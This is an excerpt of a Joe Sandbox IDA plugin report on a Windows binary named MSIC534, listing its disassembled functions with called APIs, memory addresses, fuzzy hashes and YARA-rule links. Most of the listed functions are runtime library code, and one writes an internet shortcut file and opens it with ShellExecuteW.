Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: __scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3070443116-0
Opcode ID: 6cee35d11a79b8bb1112fc6f745af27cbdf9ac5f6833fa79e76764f6e9b4bfe5
Instruction ID: e0477fa49ecdf1a153f400dc7a763fc0e2f12f27c2272cf3265aa91248243d4d
Opcode Fuzzy Hash: 6cee35d11a79b8bb1112fc6f745af27cbdf9ac5f6833fa79e76764f6e9b4bfe5
Instruction Fuzzy Hash: BB312621E0C64341FA74AF6494623BD32B1AF557C4F84643BEA0ECB2E7DE7CB8648250

Function 00007FF6D9C283B0 Relevance: 3.1, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_set_fmode.LIBCMT ref: 00007FF6D9C283C7
_RTC_Initialize.LIBCMT ref: 00007FF6D9C283E8

Part of subcall function 00007FF6D9C3BFD0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C3C004

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Initialize_invalid_parameter_noinfo_set_fmode
String ID:
API String ID: 3548387204-0
Opcode ID: b1e6c70da2e61cc17f3a455e4fd642551ce0edfef17335b2559a393fc4bb5622
Instruction ID: 451bb4d0fee4ea0c6d0b2d5b15f04e8c92e4dabc73a3c5d4f2c09887c11365d2
Opcode Fuzzy Hash: b1e6c70da2e61cc17f3a455e4fd642551ce0edfef17335b2559a393fc4bb5622
Instruction Fuzzy Hash: 8C118A54E1910742FA74BFB148662BD22B15F943C4F452877EA0ECA2C7EE3DB8714662

Function 00007FF6D9C450D8 Relevance: 3.0, APIs: 2, Instructions: 46
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF6D9C3C16A,?,?,?,00007FF6D9C3C436,?,?,?,?,00007FF6D9C4A3C0,?,?,?), ref: 00007FF6D9C450EC
FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF6D9C3C16A,?,?,?,00007FF6D9C3C436,?,?,?,?,00007FF6D9C4A3C0,?,?,?), ref: 00007FF6D9C45156

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 129f9ed9d6e46fbe024be29005a8f184e39638c1c551896208562cd4bf81eeca
Instruction ID: 0d14513390acfa2350aca01108aa4c337f00d2e3edbc7c60841306dcb0773527
Opcode Fuzzy Hash: 129f9ed9d6e46fbe024be29005a8f184e39638c1c551896208562cd4bf81eeca
Instruction Fuzzy Hash: 85018411F187A581EA20AF61641506E7370AF58FE0B484636DF6E57BCADE2CF8628740

Function 00007FF6D9C3EC80 Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6D9C3ECB6

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: __vcrt_uninitialize_ptd
String ID:
API String ID: 1180542099-0
Opcode ID: 59d777d7a2a471f6221c9ac1909ae81a32853ae31e89e6473afd101fc85dda12
Instruction ID: 7a5dd37f70cf2550ee5e79816ee60499d21258a6998ca21a5c830e3fa079773a
Opcode Fuzzy Hash: 59d777d7a2a471f6221c9ac1909ae81a32853ae31e89e6473afd101fc85dda12
Instruction Fuzzy Hash: 3BE0EE64E0D29383E9557F3428420BC22B02F683D0F900A37D02EC32E2EE1C71359B21

Function 00007FF6D9C27F00 Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6D9C27F14

Part of subcall function 00007FF6D9C29F08: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6D9C29F10
Part of subcall function 00007FF6D9C29F08: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF6D9C29F15

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
String ID:
API String ID: 1208906642-0
Opcode ID: b406c482bd6f2c871e11d82f4c101536c11149533ae63c44bb7f5e876bfe7ee7
Instruction ID: 037c019c820e5206cbd4526447b485f89e2718301c3ccd77eac85024d8d1525e
Opcode Fuzzy Hash: b406c482bd6f2c871e11d82f4c101536c11149533ae63c44bb7f5e876bfe7ee7
Instruction Fuzzy Hash: CBE09220E0D24241FDB46E6101822BC22740F623C4F50247BE899C3183DD7E30761661

Function 00007FF6D9C419F0 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FF6D9C41A10

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: af451be784cd1612df3aad53b5d54c203146c96e75ed0741bde73cc1dd9b507a
Instruction ID: cf079772c5ade03a1213c7ee588e00f2cecbd9a0eb568d15995a63a6cc6892bc
Opcode Fuzzy Hash: af451be784cd1612df3aad53b5d54c203146c96e75ed0741bde73cc1dd9b507a
Instruction Fuzzy Hash: 7ED0C925B3564183E3409F11D885BA96378F798751FD01026E94AC1A94CF7CC2A9CB11

Function 00007FF6D9C3ED00 Relevance: 1.3, APIs: 1, Instructions: 29
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF6D9C3E68D,?,?,00000000,00007FF6D9C2D9CF,?,?,?,00007FF6D9C3C5CB,?,00000000,?,00007FF6D9C3C4C1), ref: 00007FF6D9C3ED3E

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 9c33abf06edc4973dd13413fb3fae6b4b6ada102295991483a2b98f6ebe4a3f4
Instruction ID: f6479df47073122a1fada6cd549063d1bbdd8b24937bce5d98d89b1ec9124f5f
Opcode Fuzzy Hash: 9c33abf06edc4973dd13413fb3fae6b4b6ada102295991483a2b98f6ebe4a3f4
Instruction Fuzzy Hash: 97F01251F0924686FE645F71584127D11B45F687F0F484632DD2EC72D5EE2CA4618710

Non-executed Functions

Function 00007FF6D9C17268 Relevance: 81.8, APIs: 54, Instructions: 808COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C172BF
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C172E8
_Getctype.LIBCPMT ref: 00007FF6D9C1731C
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C17377
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C173A0
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C173E3
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C1740C
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C1744B
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C17474
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C174B0
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C174D9
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C17518
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C17541
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C1757E
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C175A7
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C17605
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C1762E
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C17689
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C176B2
_Getcoll.LIBCPMT ref: 00007FF6D9C176E6
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C17712
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C1773B
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C1777E
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C177A7
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C17852
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C1787B
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C17922
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C1794B
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C179F0
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C17A19
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C17A77
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C17AA0
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C17AE3
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C17B0C
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C17B78
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C17BA1
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C17BE8
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C17C11

Part of subcall function 00007FF6D9C15EE4: _Getvals.LIBCPMT ref: 00007FF6D9C15F62

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C17C78
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C17CA1
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C17CE1
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C17D0A
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C17D90
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C17DB9
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C17E00
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C17E29
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C17EA0
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C17EC9

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$GetcollGetctypeGetvals
String ID:
API String ID: 553569086-0
Opcode ID: 550fe537e3995708685281ba595a73be6ebecc8fbae1a6eacc8b5c44945c65f2
Instruction ID: 71b27aca375b39fe05ab21146cd3cf51e2690d36da57675edec3ee2517be3524
Opcode Fuzzy Hash: 550fe537e3995708685281ba595a73be6ebecc8fbae1a6eacc8b5c44945c65f2
Instruction Fuzzy Hash: 69821B62E19A4285FB45DF21D8902BD27B0AF657C4F484137E94ED72A6EE3CE4B1C344

Function 00007FF6D9C165C4 Relevance: 81.8, APIs: 54, Instructions: 808COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C1661B
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C16644
_Getctype.LIBCPMT ref: 00007FF6D9C16678
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C166D3
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C166FC
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C1673F
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C16768
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C167A7
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C167D0
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C1680C
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C16835
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C16874
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C1689D
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C168DA
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C16903
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C16961
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C1698A
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C169E5
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C16A0E
_Getcoll.LIBCPMT ref: 00007FF6D9C16A42
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C16A6E
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C16A97
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C16ADA
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C16B03
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C16BAE
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C16BD7
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C16C7E
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C16CA7
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C16D4C
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C16D75
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C16DD3
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C16DFC
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C16E3F
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C16E68
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C16ED4
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C16EFD
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C16F44
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C16F6D
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C16FD4
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C16FFD
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C1703D
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C17066
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C170EC
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C17115
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C1715C
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C17185
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C171FC
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C17225

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$GetcollGetctype
String ID:
API String ID: 19648113-0
Opcode ID: 208578fbf0aff5e00fbc3174e06ca2abcd74e2038bad76ee8959a3c603800faa
Instruction ID: 7b4d5c1b0972f5f43e9487407c79e1c4ad2d2c439ee6fd75b258b02b5f943ace
Opcode Fuzzy Hash: 208578fbf0aff5e00fbc3174e06ca2abcd74e2038bad76ee8959a3c603800faa
Instruction Fuzzy Hash: 91822862A09A4285FB45DF21D9802BC37B0AF55BC4F484537E94ED72A6EE3CE4B1D384

Function 00007FF6D9C23A33 Relevance: 50.0, APIs: 33, Instructions: 485COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C23A62
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C23A8B
_Getcoll.LIBCPMT ref: 00007FF6D9C23ABF
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C23AEB
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C23B14
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C23B57
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C23B80
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C23BBF
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C23BE8
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C23C2B
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C23C54
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C23C93
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C23CBC
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C23CFA
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C23D23
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C23D61
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C23D8A
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C23DC7
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C23DF0
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C23E4E
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C23E77
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C23EBA
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C23EE3
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C23F4F
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C23F78
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C23FBF
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C23FE8
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C2404F
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C24078
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C240B8
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C240E1
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C2415E
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C24187

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Getcoll
String ID:
API String ID: 2318601406-0
Opcode ID: 7b9aeb7c851e121a815c255632410949109334a64af1fb91696ada00cf8e8c7f
Instruction ID: b1a5e4502f4dafd9663c12dfa4b00b83b1360df2dd05907a1258207930660a9c
Opcode Fuzzy Hash: 7b9aeb7c851e121a815c255632410949109334a64af1fb91696ada00cf8e8c7f
Instruction Fuzzy Hash: 6F220861A19A4286FB55DF11E8802BD33B0AF55BC0F485537E94EC76A6EE3CE471C380

Function 00007FF6D9BF85C0 Relevance: 44.2, APIs: 21, Strings: 4, Instructions: 403filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D9BF50F0: LocalFree.KERNEL32 ref: 00007FF6D9BF5189
Part of subcall function 00007FF6D9BF50F0: LocalFree.KERNEL32 ref: 00007FF6D9BF51EF

CreateFileW.KERNEL32 ref: 00007FF6D9BF863F
LocalFree.KERNEL32 ref: 00007FF6D9BF8689
WideCharToMultiByte.KERNEL32 ref: 00007FF6D9BF8702
LocalAlloc.KERNEL32 ref: 00007FF6D9BF8717
WideCharToMultiByte.KERNEL32 ref: 00007FF6D9BF874D
WriteFile.KERNEL32 ref: 00007FF6D9BF8861
CloseHandle.KERNEL32 ref: 00007FF6D9BF886D
MultiByteToWideChar.KERNEL32 ref: 00007FF6D9BF88B1
LocalAlloc.KERNEL32 ref: 00007FF6D9BF88D2
MultiByteToWideChar.KERNEL32 ref: 00007FF6D9BF88FD
LocalFree.KERNEL32(?), ref: 00007FF6D9BF89AC
ShellExecuteW.SHELL32 ref: 00007FF6D9BF89FA
LocalFree.KERNEL32 ref: 00007FF6D9BF8A43
ShellExecuteW.SHELL32 ref: 00007FF6D9BF8AB1
LocalFree.KERNEL32 ref: 00007FF6D9BF8AF6
LocalFree.KERNEL32 ref: 00007FF6D9BF8B2D
LocalFree.KERNEL32 ref: 00007FF6D9BF8B7C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF8BC1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF8BC7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF8BCD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF8BD3

Strings

open, xrefs: 00007FF6D9BF89F1, 00007FF6D9BF8A65
URL Shortcut content:, xrefs: 00007FF6D9BF8922
[InternetShortcut]URL=, xrefs: 00007FF6D9BF8764
-_.~!*'();:@&=+$,/?#[], xrefs: 00007FF6D9BF87A9

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Local$Free$ByteCharMultiWide_invalid_parameter_noinfo_noreturn$AllocExecuteFileShell$CloseCreateHandleWrite
String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
API String ID: 3074492896-3004881174
Opcode ID: 678960cae7f20f7201e0e4798983c1c9bcf00aa199cdc569d3a41715cdf64e7f
Instruction ID: f43f937bfc94316629534a4d4e32b29eb1551e64b54f865b097456fb34ddac11
Opcode Fuzzy Hash: 678960cae7f20f7201e0e4798983c1c9bcf00aa199cdc569d3a41715cdf64e7f
Instruction Fuzzy Hash: F8F1BE66A09B8586EB108F64E85437E77B0FB86BD8F414532DA8E87BA4DF3DD464C300

Function 00007FF6D9C3412C Relevance: 43.8, APIs: 22, Strings: 2, Instructions: 1842COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF6D9C34E52
memcpy_s.LIBCPMT ref: 00007FF6D9C35083
memcpy_s.LIBCPMT ref: 00007FF6D9C350C4
